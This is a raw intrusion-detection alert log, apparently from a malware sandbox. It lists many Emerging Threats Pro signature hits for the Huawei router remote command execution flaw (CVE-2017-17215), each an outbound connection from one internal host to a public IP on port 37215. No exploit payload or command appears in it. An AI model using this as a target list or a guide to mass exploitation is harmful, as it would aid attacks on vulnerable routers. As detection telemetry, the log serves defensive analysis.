                                                    07/10/24-08:27:33.854360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4110837215192.168.2.14157.145.112.157
                                                    07/10/24-08:26:36.343615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5383437215192.168.2.14188.99.213.2
                                                    07/10/24-08:26:47.929334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4975037215192.168.2.14197.255.14.135
                                                    07/10/24-08:26:52.057809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5356237215192.168.2.1441.84.202.75
                                                    07/10/24-08:26:36.397688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5504837215192.168.2.14197.243.223.175
                                                    07/10/24-08:27:22.571797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3949637215192.168.2.1441.21.98.109
                                                    07/10/24-08:26:26.613103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4339037215192.168.2.1441.168.148.97
                                                    07/10/24-08:27:11.480663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4291237215192.168.2.1427.197.252.57
                                                    07/10/24-08:26:55.421947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3904237215192.168.2.14157.139.55.68
                                                    07/10/24-08:26:31.095355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3759437215192.168.2.14157.146.171.23
                                                    07/10/24-08:26:25.474823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3659037215192.168.2.1461.48.216.173
                                                    07/10/24-08:26:53.196604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4671837215192.168.2.14157.103.0.56
                                                    07/10/24-08:27:22.882640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4740637215192.168.2.14172.160.238.57
                                                    07/10/24-08:26:43.686036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3563837215192.168.2.14197.220.73.255
                                                    07/10/24-08:27:07.268658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3791037215192.168.2.14197.24.84.41
                                                    07/10/24-08:26:29.868955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4659237215192.168.2.1479.53.96.197
                                                    07/10/24-08:27:22.487883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5290637215192.168.2.14157.200.177.73
                                                    07/10/24-08:26:34.248893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5685237215192.168.2.1441.243.167.68
                                                    07/10/24-08:27:28.120575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4825837215192.168.2.1441.46.206.139
                                                    07/10/24-08:27:30.556731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4034837215192.168.2.14157.147.166.114
                                                    07/10/24-08:26:22.290306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3530637215192.168.2.1441.14.4.186
                                                    07/10/24-08:26:20.164271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3751037215192.168.2.1441.106.123.113
                                                    07/10/24-08:26:47.926462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5984637215192.168.2.14131.212.182.153
                                                    07/10/24-08:26:49.808477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6028037215192.168.2.1453.96.149.57
                                                    07/10/24-08:27:02.772375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3905037215192.168.2.1441.118.161.250
                                                    07/10/24-08:26:29.864679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5675637215192.168.2.14197.110.84.193
                                                    07/10/24-08:26:59.853365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5530037215192.168.2.1441.179.97.135
                                                    07/10/24-08:26:33.243364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3569837215192.168.2.1441.99.167.157
                                                    07/10/24-08:27:07.255298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4243637215192.168.2.1441.170.146.214
                                                    07/10/24-08:27:31.448470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4300837215192.168.2.14137.248.234.184
                                                    07/10/24-08:26:11.542221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4789237215192.168.2.14157.94.171.151
                                                    07/10/24-08:26:55.343631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3907637215192.168.2.1441.81.44.213
                                                    07/10/24-08:27:07.307540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4152637215192.168.2.14197.153.181.248
                                                    07/10/24-08:26:22.256237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3631837215192.168.2.1477.174.63.77
                                                    07/10/24-08:26:26.600239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3455437215192.168.2.1441.34.207.27
                                                    07/10/24-08:26:59.600211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5615237215192.168.2.1441.201.183.211
                                                    07/10/24-08:26:26.586309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5849037215192.168.2.1441.33.236.147
                                                    07/10/24-08:26:28.850354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4169437215192.168.2.14197.73.99.69
                                                    07/10/24-08:26:52.055054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4656237215192.168.2.1441.9.20.243
                                                    07/10/24-08:26:22.301370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4267037215192.168.2.14165.161.133.25
                                                    07/10/24-08:27:07.376255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4736037215192.168.2.1476.249.137.178
                                                    07/10/24-08:26:22.260349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4232437215192.168.2.14197.0.148.46
                                                    07/10/24-08:26:57.536379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5497037215192.168.2.14157.23.203.221
                                                    07/10/24-08:26:36.435588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3890837215192.168.2.14197.148.120.7
                                                    07/10/24-08:26:36.337218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4853837215192.168.2.14122.35.113.42
                                                    07/10/24-08:27:03.033408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5778237215192.168.2.1441.80.54.225
                                                    07/10/24-08:26:47.879237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3437037215192.168.2.14197.154.173.136
                                                    07/10/24-08:27:27.164034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4419237215192.168.2.14157.207.158.234
                                                    07/10/24-08:26:15.788826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5735437215192.168.2.1441.162.215.169
                                                    07/10/24-08:27:05.230940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5135037215192.168.2.14115.56.54.60
                                                    07/10/24-08:26:13.671572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4017437215192.168.2.14157.132.219.156
                                                    07/10/24-08:26:47.909293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4771237215192.168.2.14138.69.14.179
                                                    07/10/24-08:26:47.895681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5751837215192.168.2.14157.14.235.246
                                                    07/10/24-08:26:28.922659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4061637215192.168.2.14197.221.113.11
                                                    07/10/24-08:26:28.911509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3383437215192.168.2.14197.128.38.177
                                                    07/10/24-08:26:33.262601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5739837215192.168.2.1441.213.239.135
                                                    07/10/24-08:26:47.856770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3698637215192.168.2.1483.248.160.238
                                                    07/10/24-08:27:22.931726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5811637215192.168.2.1441.176.111.245
                                                    07/10/24-08:27:20.474146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4709237215192.168.2.14157.37.34.59
                                                    07/10/24-08:26:42.459051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5173837215192.168.2.14157.32.217.7
                                                    07/10/24-08:26:51.996552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4996237215192.168.2.14197.186.201.145
                                                    07/10/24-08:27:20.495859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721237215192.168.2.1443.232.55.87
                                                    07/10/24-08:27:08.417840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4096037215192.168.2.14221.8.125.226
                                                    07/10/24-08:26:49.921267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4889837215192.168.2.1441.167.206.167
                                                    07/10/24-08:27:08.451425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4811837215192.168.2.1441.121.40.209
                                                    07/10/24-08:26:23.307876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4156237215192.168.2.1441.183.210.46
                                                    07/10/24-08:26:42.391743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5014637215192.168.2.14154.79.63.115
                                                    07/10/24-08:27:02.716431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5630637215192.168.2.14157.154.115.232
                                                    07/10/24-08:26:28.681794TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4940237215192.168.2.14157.95.227.220
                                                    07/10/24-08:26:29.785401TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4763437215192.168.2.1441.19.108.39
                                                    07/10/24-08:27:22.758689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6019037215192.168.2.14197.192.88.158
                                                    07/10/24-08:26:42.437596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3665637215192.168.2.1454.135.32.126
                                                    07/10/24-08:27:24.958749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5725837215192.168.2.1441.88.151.106
                                                    07/10/24-08:27:11.540186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4892837215192.168.2.14157.45.241.50
                                                    07/10/24-08:27:32.491395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4262237215192.168.2.14197.101.120.51
                                                    07/10/24-08:26:38.642305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4664637215192.168.2.14116.93.102.4
                                                    07/10/24-08:27:02.749504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3921637215192.168.2.14197.185.209.224
                                                    07/10/24-08:26:14.811760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4405637215192.168.2.14197.234.132.84
                                                    07/10/24-08:26:28.638597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4052637215192.168.2.14197.197.213.36
                                                    07/10/24-08:26:51.960962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5302037215192.168.2.14157.47.126.57
                                                    07/10/24-08:26:23.353927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4854237215192.168.2.1474.205.66.202
                                                    07/10/24-08:27:27.159131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4988637215192.168.2.1441.32.5.208
                                                    07/10/24-08:26:26.563036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4680437215192.168.2.14157.123.90.255
                                                    07/10/24-08:27:05.058899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4307237215192.168.2.14197.206.203.195
                                                    07/10/24-08:26:38.549884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5887637215192.168.2.14137.184.102.103
                                                    07/10/24-08:26:34.209282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654237215192.168.2.14157.0.230.213
                                                    07/10/24-08:26:49.840323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4071437215192.168.2.14157.55.38.200
                                                    07/10/24-08:26:31.105157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5041037215192.168.2.14176.89.172.239
                                                    07/10/24-08:26:22.216208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4402837215192.168.2.1441.24.120.47
                                                    07/10/24-08:27:14.821259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5359237215192.168.2.1469.212.89.96
                                                    07/10/24-08:26:33.228376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5501837215192.168.2.14117.37.50.38
                                                    07/10/24-08:26:23.279248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3830637215192.168.2.1441.249.97.205
                                                    07/10/24-08:27:24.928816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5824437215192.168.2.1464.83.74.35
                                                    07/10/24-08:27:33.872945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4109037215192.168.2.14202.181.247.46
                                                    07/10/24-08:27:19.151006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3356037215192.168.2.1469.185.48.244
                                                    07/10/24-08:26:38.642305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5322237215192.168.2.1441.75.4.144
                                                    07/10/24-08:27:28.180841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3629237215192.168.2.1441.133.218.220
                                                    07/10/24-08:27:30.450144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5680837215192.168.2.14157.128.19.130
                                                    07/10/24-08:26:29.856235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5519037215192.168.2.1463.254.157.108
                                                    07/10/24-08:26:34.216677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4328037215192.168.2.14197.252.106.248
                                                    07/10/24-08:27:03.004303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5871037215192.168.2.14197.140.203.100
                                                    07/10/24-08:27:10.772266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5782237215192.168.2.14197.105.204.159
                                                    07/10/24-08:27:22.879790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6037237215192.168.2.1441.145.61.95
                                                    07/10/24-08:26:36.427022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4999437215192.168.2.1473.201.210.147
                                                    07/10/24-08:27:32.600329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5812037215192.168.2.14157.205.93.86
                                                    07/10/24-08:26:25.430208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5269437215192.168.2.14157.55.169.26
                                                    07/10/24-08:26:17.925290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6064637215192.168.2.14217.249.199.178
                                                    07/10/24-08:27:31.559678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5487837215192.168.2.1441.61.52.19
                                                    07/10/24-08:26:51.999483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4949837215192.168.2.1441.97.29.98
                                                    07/10/24-08:27:19.303785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5601437215192.168.2.14149.40.15.141
                                                    07/10/24-08:27:32.587332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4613037215192.168.2.14217.75.75.47
                                                    07/10/24-08:26:15.837578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5711037215192.168.2.1463.117.197.49
                                                    07/10/24-08:27:03.012569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3439837215192.168.2.14157.164.140.66
                                                    07/10/24-08:27:08.350024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4286037215192.168.2.14163.24.112.56
                                                    07/10/24-08:27:13.985785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4968837215192.168.2.1441.45.0.73
                                                    07/10/24-08:26:17.981659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3514437215192.168.2.1441.237.193.22
                                                    07/10/24-08:26:38.631405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5972437215192.168.2.1441.232.79.35
                                                    07/10/24-08:27:34.117874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5557237215192.168.2.14217.185.191.73
                                                    07/10/24-08:27:05.167933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5789237215192.168.2.14113.237.79.3
                                                    07/10/24-08:27:11.522434TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5143037215192.168.2.14197.168.31.212
                                                    07/10/24-08:26:23.294372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3598237215192.168.2.14197.119.251.188
                                                    07/10/24-08:27:13.980831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4953037215192.168.2.14157.44.243.100
                                                    07/10/24-08:27:05.151857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4236637215192.168.2.1441.168.11.42
                                                    07/10/24-08:27:19.320404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4706637215192.168.2.14157.130.206.33
                                                    07/10/24-08:27:23.941043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4294037215192.168.2.1441.99.190.13
                                                    07/10/24-08:26:55.458086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5060637215192.168.2.14197.193.250.74
                                                    07/10/24-08:27:14.793732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4224037215192.168.2.14157.178.47.164
                                                    07/10/24-08:26:15.870897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3928837215192.168.2.14157.60.122.210
                                                    07/10/24-08:26:49.866292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4989237215192.168.2.14197.104.200.241
                                                    07/10/24-08:26:52.008729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4321037215192.168.2.14124.101.214.55
                                                    07/10/24-08:26:13.828221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4693237215192.168.2.1441.80.239.53
                                                    07/10/24-08:26:41.349048TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3853437215192.168.2.14111.81.90.27
                                                    07/10/24-08:26:42.347593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6091637215192.168.2.1441.53.86.29
                                                    07/10/24-08:26:53.181411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4608637215192.168.2.14197.219.17.175
                                                    07/10/24-08:27:05.109187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5111637215192.168.2.1441.233.183.46
                                                    07/10/24-08:26:34.262800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3854037215192.168.2.14197.230.185.181
                                                    07/10/24-08:27:24.893160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5481437215192.168.2.1441.155.30.166
                                                    07/10/24-08:27:24.985938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3347837215192.168.2.1441.218.184.77
                                                    07/10/24-08:26:29.817859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3697437215192.168.2.14197.90.225.59
                                                    07/10/24-08:26:22.216142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3904837215192.168.2.14197.74.85.109
                                                    07/10/24-08:27:30.526140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5358237215192.168.2.14190.177.25.107
                                                    07/10/24-08:27:02.960624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3474637215192.168.2.14216.162.95.159
                                                    07/10/24-08:27:23.903843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3382437215192.168.2.14197.145.13.62
                                                    07/10/24-08:26:41.621146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3930437215192.168.2.1441.247.127.118
                                                    07/10/24-08:27:13.829336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4139837215192.168.2.14197.68.109.215
                                                    07/10/24-08:27:27.144985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5389837215192.168.2.14197.158.37.42
                                                    07/10/24-08:26:11.590695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4751837215192.168.2.14177.47.141.82
                                                    07/10/24-08:26:55.402218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4436237215192.168.2.14197.108.77.37
                                                    07/10/24-08:26:15.764270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5046437215192.168.2.14157.138.128.85
                                                    07/10/24-08:27:20.515408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3449037215192.168.2.14197.155.162.170
                                                    07/10/24-08:26:36.437126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5778637215192.168.2.14157.235.6.246
                                                    07/10/24-08:27:17.050369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3854437215192.168.2.14157.135.112.123
                                                    07/10/24-08:27:02.974935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3631837215192.168.2.14157.192.61.245
                                                    07/10/24-08:26:26.561697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4966437215192.168.2.1441.216.62.231
                                                    07/10/24-08:26:55.366242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5301037215192.168.2.14197.225.151.166
                                                    07/10/24-08:26:53.154328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4348237215192.168.2.1472.55.235.242
                                                    07/10/24-08:26:43.742007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4927037215192.168.2.14157.162.24.226
                                                    07/10/24-08:26:36.322719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3505837215192.168.2.14197.134.226.56
                                                    07/10/24-08:27:27.151316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3621637215192.168.2.14146.125.31.215
                                                    07/10/24-08:26:15.840335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5305037215192.168.2.14157.135.20.192
                                                    07/10/24-08:26:43.779854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5778637215192.168.2.14197.210.175.47
                                                    07/10/24-08:26:55.268885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4845837215192.168.2.14157.159.31.49
                                                    07/10/24-08:27:20.513537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4958037215192.168.2.14157.32.124.3
                                                    07/10/24-08:26:11.610519TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5567637215192.168.2.14157.247.11.168
                                                    07/10/24-08:27:05.134098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3831837215192.168.2.14197.228.9.130
                                                    07/10/24-08:26:13.747131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5141237215192.168.2.14197.241.238.101
                                                    07/10/24-08:26:38.563321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4942837215192.168.2.1444.182.81.217
                                                    07/10/24-08:27:13.985222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4581237215192.168.2.14197.83.207.201
                                                    07/10/24-08:26:47.926461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3810037215192.168.2.1441.8.247.250
                                                    07/10/24-08:26:15.860013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5857037215192.168.2.1454.236.161.67
                                                    07/10/24-08:27:05.163541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5542837215192.168.2.14157.66.52.0
                                                    07/10/24-08:27:10.642690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5173837215192.168.2.14157.186.169.104
                                                    07/10/24-08:27:02.933284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5760637215192.168.2.1441.0.227.242
                                                    07/10/24-08:27:13.800580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4840437215192.168.2.1441.62.5.40
                                                    07/10/24-08:26:28.758809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4770037215192.168.2.14197.216.109.75
                                                    07/10/24-08:26:41.616249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4554437215192.168.2.14157.103.39.9
                                                    07/10/24-08:26:11.616592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4654037215192.168.2.14157.158.167.175
                                                    07/10/24-08:26:13.646221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5973037215192.168.2.14177.220.89.193
                                                    07/10/24-08:26:42.154105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4948637215192.168.2.14157.78.34.133
                                                    07/10/24-08:27:13.862635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3405837215192.168.2.1474.229.79.163
                                                    07/10/24-08:26:42.419943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5027637215192.168.2.14197.234.107.24
                                                    07/10/24-08:26:13.759020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3522037215192.168.2.14157.59.253.208
                                                    07/10/24-08:26:43.574763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5659637215192.168.2.14157.33.66.63
                                                    07/10/24-08:27:19.253247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5590637215192.168.2.1451.115.126.163
                                                    07/10/24-08:26:34.243243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4009637215192.168.2.14157.165.130.130
                                                    07/10/24-08:27:11.540187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3742437215192.168.2.1439.230.255.67
